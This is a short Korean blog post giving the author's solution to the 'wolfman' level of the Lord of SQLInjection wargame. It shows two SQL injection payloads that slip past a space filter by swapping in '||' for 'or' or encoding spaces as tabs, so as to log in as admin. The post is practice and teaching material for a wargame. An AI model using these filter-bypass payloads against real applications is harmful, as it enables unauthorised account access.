선릉역 1번 출구

LORD OF SQLINJECTION - wolfman 본문

Hacking & Security/Web_hacking 문제풀이

LORD OF SQLINJECTION - wolfman

choideu 2021. 8. 12. 14:25

이번에는 공백을 막았다. or를 막기 위함인데 이는 ||으로 대체해서 공략할 수 있다.

 

1. || 사용하기

pw가 ''로 선언되어 있기 때문에 query는 아래처럼 작성해준다. (%27->')

?pw=1%27||id=%27admin

 

2. 주석으로 공백을 대체하기

?pw=1'%09or%09id='admin
//%09 = tab이고 tab으로 공백을 대체해주었음

'Hacking & Security > Web_hacking 문제풀이' 카테고리의 다른 글

LORD OF SQLINJECTION - darkelf  (0) 2021.08.12
Webhacking_18 문제풀이  (0) 2021.08.12
LORD OF SQLINJECTION - goblin  (0) 2021.08.12
LORD OF SQLINJECTION - cobolt  (0) 2021.08.12
LORD OF SQLINJECTION - gremlin  (0) 2021.08.12
'Hacking & Security/Web_hacking 문제풀이' Related Articles more
Comments